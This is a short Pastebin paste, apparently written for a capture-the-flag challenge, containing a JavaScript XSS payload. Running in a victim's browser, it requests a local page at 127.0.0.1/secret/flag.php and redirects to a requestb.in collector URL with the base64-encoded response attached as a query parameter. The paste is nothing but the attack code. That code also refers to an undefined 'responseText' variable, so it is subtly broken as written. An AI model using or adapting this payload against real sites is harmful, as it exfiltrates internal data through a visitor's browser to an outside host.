sakiir

Untitled

Feb 4th, 2017
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. <script>
  2. var request = new XMLHttpRequest();
  3. request.onreadystatechange = function() {
  4. jsontext = request.responseText;
  5. window.location = 'https://requestb.in/y5ttrxy5?FLAG=' + btoa(responseText);
  6. }
  7. request.open("GET", "http://127.0.0.1/secret/flag.php", true);
  8. request.send();
  9. </script>
Advertisement
Add Comment
Please, Sign In to add comment